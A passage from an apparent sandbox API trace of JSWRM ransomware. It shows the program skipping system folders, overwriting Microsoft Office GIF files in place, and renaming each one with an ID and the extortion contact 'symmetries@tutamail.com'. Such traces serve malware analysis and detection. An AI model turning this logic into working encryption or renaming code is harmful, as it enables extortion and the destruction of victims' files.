(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR43F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR43F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR43F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0119.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.583] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2654) returned 1 [0119.583] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa50) returned 0x22fd48 [0119.583] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e534*=0xa50, lpOverlapped=0x0) returned 1 [0119.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.607] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e530*=0xa50, lpOverlapped=0x0) returned 1 [0119.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0119.607] CloseHandle (hObject=0x314) returned 1 [0119.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0119.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0119.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.608] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR43F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir43f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.609] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3606, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR44B.GIF", cAlternateFileName="")) returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2=".") returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="..") returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="...") returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="windows") returned -1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="recovery") returned -1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="perflogs") returned -1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="documents and settings") returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="system volume information") returned -1 [0119.609] lstrcmpiW (lpString1="PDIR44B.GIF", lpString2="msocache") returned 1 [0119.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0119.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR44B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0119.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR44B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.611] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13830) returned 1 [0119.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3600) returned 0x24e1d8 [0119.611] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3600, lpOverlapped=0x0) returned 1 [0119.616] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.616] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3600, lpOverlapped=0x0) returned 1 [0119.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.616] CloseHandle (hObject=0x314) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0119.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0119.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.616] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0119.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.618] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3026, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR44F.GIF", cAlternateFileName="")) returned 1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2=".") returned 1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="..") returned 1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="...") returned 1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="windows") returned -1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="recovery") returned -1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="perflogs") returned -1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="documents and settings") returned 1 [0119.618] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.619] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="system volume information") returned -1 [0119.619] lstrcmpiW (lpString1="PDIR44F.GIF", lpString2="msocache") returned 1 [0119.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR44F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0119.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR44F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR44F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0119.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.620] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12326) returned 1 [0119.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3020) returned 0x24e1d8 [0119.620] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3020, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3020, lpOverlapped=0x0) returned 1 [0119.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.624] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3020, lpOverlapped=0x0) returned 1 [0119.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.624] CloseHandle (hObject=0x314) returned 1 [0119.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR44F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir44f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.626] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2019, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR45B.GIF", cAlternateFileName="")) returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2=".") returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="..") returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="...") returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="windows") returned -1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="recovery") returned -1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="perflogs") returned -1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="documents and settings") returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="system volume information") returned -1 [0119.626] lstrcmpiW (lpString1="PDIR45B.GIF", lpString2="msocache") returned 1 [0119.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0119.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR45B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0119.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR45B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 